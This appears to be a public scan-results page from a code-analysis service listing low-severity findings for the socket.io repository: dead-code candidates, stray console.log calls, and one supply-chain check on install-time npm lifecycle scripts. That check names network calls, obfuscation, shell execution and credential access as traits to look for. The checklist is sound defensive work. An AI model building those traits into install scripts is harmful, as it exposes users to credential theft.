low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-redis-streams-emitter/lib/adapter-types.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-redis-streams-emitter/lib/typed-events.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io/lib/socket-types.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io/test/fixtures/server-close.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io/test/middleware.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io/test/socket-middleware.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io/test/socket-timeout.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io/test/v2-compatibility.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph quality Integrity conf 1.00 Old/deprecated-named symbol `io_v2` in packages/socket.io/test/v2-compatibility.ts:4
Names with suffixes like `_old`, `_v1`, `_deprecated` usually indicate replaced-but-not-removed code (typical AI-coder leftover). Confirm and delete, or rename if it's the active version.
old markerDead code
low System graph cicd CI/CD security conf 1.00 package.json defines install-time lifecycle scripts
preinstall/install/postinstall/prepare scripts execute during dependency installation. Review them carefully for network calls, obfuscation, shell execution, or credential access.
examples/nuxt-example/package.json CI/CD securitySupply chainNpm
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/basic-crud-application/server-postgres-cluster/lib/cluster.js:7
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/basic-websocket-client/check-bundle-size.js:17
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/chat/index.js:10
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/client-side-load-balancing-example/index.js:31
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/cluster-engine-node-cluster/client.js:12
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/cluster-engine-node-cluster/server.js:16
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/cluster-engine-redis/client.js:12
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/cluster-haproxy/server/index.js:13
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/cluster-httpd/server/index.js:13
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/cluster-nginx/client/index.js:4
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/cluster-nginx/server/index.js:16
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/cluster-traefik/server/index.js:14
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/connection-state-recovery-example/cjs/index.js:32
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/connection-state-recovery-example/esm/index.js:32
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/create-react-app-example/server.js:8
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/create-react-app-example/src/serviceWorker.js:44
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/custom-parsers/src/client1.js:4
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/custom-parsers/src/client2.js:7
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/custom-parsers/src/client3.js:7
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/custom-parsers/src/client4.js:7
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/custom-parsers/src/server.js:10
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/es-modules/client.js:7
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/es-modules/server.js:6
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/expo-example/server/index.js:10
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/express-session-example/cjs/index.js:65
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/express-session-example/esm/index.js:64
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/express-session-example/ts/index.ts:71
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/http2-example/index.js:31
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/nextjs-app-router/server.js:27
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/nextjs-pages-router/server.js:27
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/nwjs-example/index.js:12
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/nwjs-example/server/index.js:6
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/passport-example/cjs/index.js:59
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/passport-example/esm/index.js:62
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/passport-example/ts/index.ts:73
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — examples/passport-jwt-example/cjs/index.js:38
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak

Showing first 300 of 353. Refine filters or use the findings page for deep search.

For AI agents: Voting guide (TP/FP) MCP manifest Stdio wrapper SARIF Integrate Findings queue Vote TP/FP on findings to calibrate the engine.
For AI agents + API integrations
Email me when this repo regresses
Free. We re-scan periodically; new criticals → your inbox. No signup required for the scan itself.
API access

This page is publicly accessible at: https://repobility.com/scan/4d28810e-b8c1-47a9-b235-f60f50ca4517/

To check status programmatically (no auth required): 

curl -s https://repobility.com/api/v1/public/scan/4d28810e-b8c1-47a9-b235-f60f50ca4517/

Important — please don't re-submit the same URL repeatedly. The submission endpoint is idempotent: re-submitting the same git URL returns this same scan_token, not a new one. To re-scan this repo, sign up free and use the dashboard.